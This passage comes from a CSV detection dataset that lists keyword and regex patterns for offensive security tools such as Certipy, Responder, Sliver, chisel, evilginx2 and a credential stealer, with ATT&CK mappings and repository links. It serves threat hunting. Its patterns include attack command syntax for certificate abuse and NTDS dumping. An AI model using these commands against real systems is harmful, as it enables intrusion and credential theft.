DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*ceffb6a2cd944a1309ee3b88992ea04e456f17bc2234b861bf1ed43e51a3e973*",".{0,1000}ceffb6a2cd944a1309ee3b88992ea04e456f17bc2234b861bf1ed43e51a3e973.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","can also be used by blueteam as a 
honeypot","10","10","1434","239","2024-02-28T06:08:59Z","2018-09-07T19:17:41Z" "*celerystalk*",".{0,1000}celerystalk.{0,1000}","offensive_tool_keyword","celerystalk","celerystalk helps you automate your network scanning/enumeration process with asynchronous jobs (aka tasks) while retaining full control of which tools you want to run.","T1046 - T1057 - T1082 - T1087 - T1069","TA0001 - TA0007","N/A","N/A","Information Gathering","https://github.com/sethsec/celerystalk","1","0","N/A","N/A","4","393","74","2021-03-24T01:23:11Z","2018-08-13T04:21:37Z" "*cerbrutus.py*",".{0,1000}cerbrutus\.py.{0,1000}","offensive_tool_keyword","cerbrutus","Network brute force tool. written in Python. Faster than other existing solutions (including the main leader in the network brute force market).","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/Cerbrutus-BruteForcer/cerbrutus","1","1","N/A","N/A","4","330","48","2021-08-22T19:05:45Z","2021-07-07T19:11:40Z" "*Cerbrutus-BruteForcer*",".{0,1000}Cerbrutus\-BruteForcer.{0,1000}","offensive_tool_keyword","cerbrutus","Network brute force tool. written in Python. Faster than other existing solutions (including the main leader in the network brute force market).","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/Cerbrutus-BruteForcer/cerbrutus","1","1","N/A","N/A","4","330","48","2021-08-22T19:05:45Z","2021-07-07T19:11:40Z" "*cert*responder.crt*",".{0,1000}cert.{0,1000}responder\.crt.{0,1000}","offensive_tool_keyword","responder","LLMNR. NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011","TA0011 - TA0005 - TA0003","N/A","N/A","Sniffing & Spoofing","https://github.com/SpiderLabs/Responder","1","0","N/A","N/A","10","4355","1646","2020-06-15T18:07:44Z","2012-10-24T14:35:12Z" "*cert*responder.key*",".{0,1000}cert.{0,1000}responder\.key.{0,1000}","offensive_tool_keyword","responder","LLMNR. 
NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011","TA0011 - TA0005 - TA0003","N/A","N/A","Sniffing & Spoofing","https://github.com/SpiderLabs/Responder","1","0","N/A","N/A","10","4355","1646","2020-06-15T18:07:44Z","2012-10-24T14:35:12Z" "*certi.py_vulntemplates_output*",".{0,1000}certi\.py_vulntemplates_output.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "*certi_py_enum*",".{0,1000}certi_py_enum.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "*Certify.exe*",".{0,1000}Certify\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*certipy account *",".{0,1000}certipy\saccount\s.{0,1000}","offensive_tool_keyword","Certipy","Tool for Active Directory Certificate Services enumeration and abuse","T1555 T1588 T1552","N/A","N/A","N/A","Exploitation tools","https://github.com/ly4k/Certipy","1","0","N/A","10","10","2135","293","2024-04-24T10:28:14Z","2021-10-06T23:02:40Z" "*certipy auth *",".{0,1000}certipy\sauth\s.{0,1000}","offensive_tool_keyword","Certipy","Tool for Active Directory Certificate Services enumeration and abuse","T1555 T1588 T1552","N/A","N/A","N/A","Exploitation tools","https://github.com/ly4k/Certipy","1","0","N/A","10","10","2135","293","2024-04-24T10:28:14Z","2021-10-06T23:02:40Z" "*certipy ca *",".{0,1000}certipy\sca\s.{0,1000}","offensive_tool_keyword","Certipy","Tool for Active Directory Certificate Services enumeration and abuse","T1555 T1588 T1552","N/A","N/A","N/A","Exploitation tools","https://github.com/ly4k/Certipy","1","0","N/A","10","10","2135","293","2024-04-24T10:28:14Z","2021-10-06T23:02:40Z" "*certipy ca -backup*",".{0,1000}certipy\sca\s\-backup.{0,1000}","offensive_tool_keyword","Certipy","Tool for Active Directory Certificate Services enumeration and abuse","T1555 T1588 T1552","N/A","N/A","N/A","Exploitation tools","https://github.com/ly4k/Certipy","1","0","N/A","10","10","2135","293","2024-04-24T10:28:14Z","2021-10-06T23:02:40Z" "*certipy cert 
*",".{0,1000}certipy\scert\s.{0,1000}","offensive_tool_keyword","Certipy","Tool for Active Directory Certificate Services enumeration and abuse","T1555 T1588 T1552","N/A","N/A","N/A","Exploitation tools","https://github.com/ly4k/Certipy","1","0","N/A","10","10","2135","293","2024-04-24T10:28:14Z","2021-10-06T23:02:40Z" "*certipy find *",".{0,1000}certipy\sfind\s.{0,1000}","offensive_tool_keyword","Certipy","Tool for Active Directory Certificate Services enumeration and abuse","T1555 T1588 T1552","N/A","N/A","N/A","Exploitation tools","https://github.com/ly4k/Certipy","1","0","N/A","10","10","2135","293","2024-04-24T10:28:14Z","2021-10-06T23:02:40Z" "*certipy find *",".{0,1000}certipy\sfind\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*certipy forge *",".{0,1000}certipy\sforge\s.{0,1000}","offensive_tool_keyword","Certipy","Tool for Active Directory Certificate Services enumeration and abuse","T1555 T1588 T1552","N/A","N/A","N/A","Exploitation tools","https://github.com/ly4k/Certipy","1","0","N/A","10","10","2135","293","2024-04-24T10:28:14Z","2021-10-06T23:02:40Z" "*Certipy not found. 
Please install Certipy before running ADCSync*",".{0,1000}Certipy\snot\sfound\.\sPlease\sinstall\sCertipy\sbefore\srunning\sADCSync.{0,1000}","offensive_tool_keyword","adcsync","Use ESC1 to perform a makeshift DCSync and dump hashes","T1003.006 - T1021","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/JPG0mez/ADCSync","1","0","N/A","9","2","185","21","2023-11-02T21:41:08Z","2023-10-04T01:56:50Z" "*certipy relay *",".{0,1000}certipy\srelay\s.{0,1000}","offensive_tool_keyword","Certipy","Tool for Active Directory Certificate Services enumeration and abuse","T1555 T1588 T1552","N/A","N/A","N/A","Exploitation tools","https://github.com/ly4k/Certipy","1","0","N/A","10","10","2135","293","2024-04-24T10:28:14Z","2021-10-06T23:02:40Z" "*certipy relay -ca *",".{0,1000}certipy\srelay\s\-ca\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*certipy req *",".{0,1000}certipy\sreq\s.{0,1000}","offensive_tool_keyword","Certipy","Tool for Active Directory Certificate Services enumeration and abuse","T1555 T1588 T1552","N/A","N/A","N/A","Exploitation tools","https://github.com/ly4k/Certipy","1","0","N/A","10","10","2135","293","2024-04-24T10:28:14Z","2021-10-06T23:02:40Z" "*certipy req -u * -p * -target-ip * -dc-ip * -ca *",".{0,1000}certipy\sreq\s\-u\s.{0,1000}\s\-p\s.{0,1000}\s\-target\-ip\s.{0,1000}\s\-dc\-ip\s.{0,1000}\s\-ca\s.{0,1000}","offensive_tool_keyword","adcsync","Use ESC1 to perform a makeshift DCSync and dump hashes","T1003.006 - T1021","TA0006 - TA0007","N/A","N/A","Credential 
Access","https://github.com/JPG0mez/ADCSync","1","0","N/A","9","2","185","21","2023-11-02T21:41:08Z","2023-10-04T01:56:50Z" "*certipy req -username *",".{0,1000}certipy\sreq\s\-username\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*certipy shadow *",".{0,1000}certipy\sshadow\s.{0,1000}","offensive_tool_keyword","Certipy","Tool for Active Directory Certificate Services enumeration and abuse","T1555 T1588 T1552","N/A","N/A","N/A","Exploitation tools","https://github.com/ly4k/Certipy","1","0","N/A","10","10","2135","293","2024-04-24T10:28:14Z","2021-10-06T23:02:40Z" "*certipy template *",".{0,1000}certipy\stemplate\s.{0,1000}","offensive_tool_keyword","Certipy","Tool for Active Directory Certificate Services enumeration and abuse","T1555 T1588 T1552","N/A","N/A","N/A","Exploitation tools","https://github.com/ly4k/Certipy","1","0","N/A","10","10","2135","293","2024-04-24T10:28:14Z","2021-10-06T23:02:40Z" "*certipy_enum*",".{0,1000}certipy_enum.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "*certipy-master.zip*",".{0,1000}certipy\-master\.zip.{0,1000}","offensive_tool_keyword","Certipy","Tool for Active Directory Certificate Services enumeration and abuse","T1555 T1588 T1552","N/A","N/A","N/A","Exploitation 
tools","https://github.com/ly4k/Certipy","1","1","N/A","10","10","2135","293","2024-04-24T10:28:14Z","2021-10-06T23:02:40Z" "*CertStealer.csproj*",".{0,1000}CertStealer\.csproj.{0,1000}","offensive_tool_keyword","CertStealer","A .NET tool for exporting and importing certificates without touching disk.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/TheWover/CertStealer","1","1","N/A","N/A","5","464","69","2021-10-08T20:48:34Z","2021-04-21T14:20:56Z" "*CertStealer.exe*",".{0,1000}CertStealer\.exe.{0,1000}","offensive_tool_keyword","CertStealer","A .NET tool for exporting and importing certificates without touching disk.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/TheWover/CertStealer","1","1","N/A","N/A","5","464","69","2021-10-08T20:48:34Z","2021-04-21T14:20:56Z" "*CertStealer.sln*",".{0,1000}CertStealer\.sln.{0,1000}","offensive_tool_keyword","CertStealer","A .NET tool for exporting and importing certificates without touching disk.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/TheWover/CertStealer","1","1","N/A","N/A","5","464","69","2021-10-08T20:48:34Z","2021-04-21T14:20:56Z" "*certsync *--dc-ip*",".{0,1000}certsync\s.{0,1000}\-\-dc\-ip.{0,1000}","offensive_tool_keyword","certsync","Dump NTDS with golden certificates and UnPAC the hash","T1553.002 - T1003.001 - T1145","TA0002 - TA0003 - TA0006","N/A","N/A","Credential Access","https://github.com/zblurx/certsync","1","0","N/A","N/A","7","602","68","2024-03-20T10:58:15Z","2023-01-31T15:37:12Z" "*certsync -u *",".{0,1000}certsync\s\-u\s.{0,1000}","offensive_tool_keyword","certsync","Dump NTDS with golden certificates and UnPAC the hash","T1553.002 - T1003.001 - T1145","TA0002 - TA0003 - TA0006","N/A","N/A","Credential Access","https://github.com/zblurx/certsync","1","0","N/A","N/A","7","602","68","2024-03-20T10:58:15Z","2023-01-31T15:37:12Z" "*certsync -u * -p *-d * -ca-ip 
*",".{0,1000}certsync\s\-u\s.{0,1000}\s\-p\s.{0,1000}\-d\s.{0,1000}\s\-ca\-ip\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*certsync_ntds_dump*",".{0,1000}certsync_ntds_dump.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "*certsync-master.zip*",".{0,1000}certsync\-master\.zip.{0,1000}","offensive_tool_keyword","certsync","Dump NTDS with golden certificates and UnPAC the hash","T1553.002 - T1003.001 - T1145","TA0002 - TA0003 - TA0006","N/A","N/A","Credential Access","https://github.com/zblurx/certsync","1","1","N/A","N/A","7","602","68","2024-03-20T10:58:15Z","2023-01-31T15:37:12Z" "*cewl --depth * --with-numbers -*",".{0,1000}cewl\s\-\-depth\s.{0,1000}\s\-\-with\-numbers\s\-.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" 
"*cf1d4595c7a03ce084a85f1545ba3593dd396eb88049c6d5c87efaa594e41c7f*",".{0,1000}cf1d4595c7a03ce084a85f1545ba3593dd396eb88049c6d5c87efaa594e41c7f.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","can also be used by blueteam as a honeypot","10","10","1434","239","2024-02-28T06:08:59Z","2018-09-07T19:17:41Z" "*cf2f9d4e499c45cf102ede7ccb8e0e4e44005f9cf0313024771dda337bd6e1dd*",".{0,1000}cf2f9d4e499c45cf102ede7ccb8e0e4e44005f9cf0313024771dda337bd6e1dd.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0002 - TA0003 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/An0nUD4Y/evilginx2","1","0","file_hash","10","1","69","16","2024-04-24T19:24:31Z","2020-07-10T06:01:11Z" "*cf3753524bf8c852c2e81c008688ecfb91e75ba207ade5ef048c33bde631baef*",".{0,1000}cf3753524bf8c852c2e81c008688ecfb91e75ba207ade5ef048c33bde631baef.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*cf9093662998386beaec51633ada8314d43b63904a3eb51e0a9096586b25ee95*",".{0,1000}cf9093662998386beaec51633ada8314d43b63904a3eb51e0a9096586b25ee95.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*cf9fb0b8e718dfebc8dfb4d5a9be9e57a00994fd060c250187ed92957b69fd15*",".{0,1000}cf9fb0b8e718dfebc8dfb4d5a9be9e57a00994fd060c250187ed92957b69fd15.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*cfcdad4c34f652853a157b3f5bf9f8748b5f74963ca41f32632bbd755c250882*",".{0,1000}cfcdad4c34f652853a157b3f5bf9f8748b5f74963ca41f32632bbd755c250882.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*cfd8565cb10640aa0710735a30291d6edb24f6a99af3704eb6bf1a016e83564f*",".{0,1000}cfd8565cb10640aa0710735a30291d6edb24f6a99af3704eb6bf1a016e83564f.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*cfed7067c52715989de828850551ceb0e92a5f1f5389a81a025424a88ab77e50*",".{0,1000}cfed7067c52715989de828850551ceb0e92a5f1f5389a81a025424a88ab77e50.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*cff5798485f1f260bed03c9f82572288df0dfd169fe1e448708d229fa8112ac8*",".{0,1000}cff5798485f1f260bed03c9f82572288df0dfd169fe1e448708d229fa8112ac8.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*cfprefsd_race_condition*",".{0,1000}cfprefsd_race_condition.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*cgBlAGcAIABzAGEAdgBlACAAaABrAGwAbQBcAHMAYQBtACAAMQ*",".{0,1000}cgBlAGcAIABzAGEAdgBlACAAaABrAGwAbQBcAHMAYQBtACAAMQ.{0,1000}","offensive_tool_keyword","SamDumpCable","Dump users sam and system hive and exfiltrate them","T1003.002 - T1564.001","TA0006 - TA0010","N/A","N/A","Credential Access","https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/SamDumpCable","1","0","N/A","10","7","698","247","2024-04-28T21:51:02Z","2021-09-08T20:33:18Z" "*cgeeodpfagjceefieflmdfphplkenlfk*",".{0,1000}cgeeodpfagjceefieflmdfphplkenlfk.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","10","1","89","61","2024-05-01T19:07:16Z","2022-11-20T19:11:00Z" "*cGlpLmZkYS5nb3Y=*",".{0,1000}cGlpLmZkYS5nb3Y\=.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","can be used for data exfiltration simulation","8","6","587","136","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" "*cGlwZW5hbWU9*",".{0,1000}cGlwZW5hbWU9.{0,1000}","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes 
Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","1","N/A","10","10","884","137","2023-10-20T14:34:33Z","2019-03-31T14:23:57Z" "*ch0sys/DUBrute*",".{0,1000}ch0sys\/DUBrute.{0,1000}","offensive_tool_keyword","DUBrute","RDP Bruteforcer","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/ch0sys/DUBrute","1","1","N/A","10","1","39","31","2018-02-19T13:03:14Z","2017-06-15T08:55:46Z" "*CH3CK70K3N(*",".{0,1000}CH3CK70K3N\(.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","10","1","89","61","2024-05-01T19:07:16Z","2022-11-20T19:11:00Z" 
"*Chachi-Enumerator.ps1*",".{0,1000}Chachi\-Enumerator\.ps1.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1044","504","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" "*Chachi-Enumerator.ps1*",".{0,1000}Chachi\-Enumerator\.ps1.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1044","504","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" "*ChaitanyaHaritash/kimi*",".{0,1000}ChaitanyaHaritash\/kimi.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1710","584","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z" "*chameleon.py *",".{0,1000}chameleon\.py\s.{0,1000}","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","0","N/A","10","10","1490","261","2023-11-03T09:33:21Z","2021-08-02T15:35:57Z" "*change_sandbox_evasion_method(*",".{0,1000}change_sandbox_evasion_method\(.{0,1000}","offensive_tool_keyword","GraphStrike","Cobalt Strike HTTPS beaconing over Microsoft Graph 
API","T1102 - T1071.001 ","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/RedSiege/GraphStrike","1","0","N/A","10","10","504","70","2024-01-29T16:39:40Z","2024-01-02T00:18:44Z" "*change_sandbox_evasion_method(*",".{0,1000}change_sandbox_evasion_method\(.{0,1000}","offensive_tool_keyword","mail-in-the-middle","This script sits in the middle between a legitimate sender of an email and the legitimate recipient of that email. This means that we (the attackers) are receiving sensitive information not originally destined to us","T1557 - T1598.002 - T1566.002 - T1192 - T1204.002 - T1539 - T1593","TA0001 - TA0006 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/sensepost/mail-in-the-middle","1","0","N/A","8","1","78","9","2024-04-01T15:28:44Z","2024-02-21T07:25:37Z" "*change_shellcode_exec_method(*",".{0,1000}change_shellcode_exec_method\(.{0,1000}","offensive_tool_keyword","mail-in-the-middle","This script sits in the middle between a legitimate sender of an email and the legitimate recipient of that email. This means that we (the attackers) are receiving sensitive information not originally destined to us","T1557 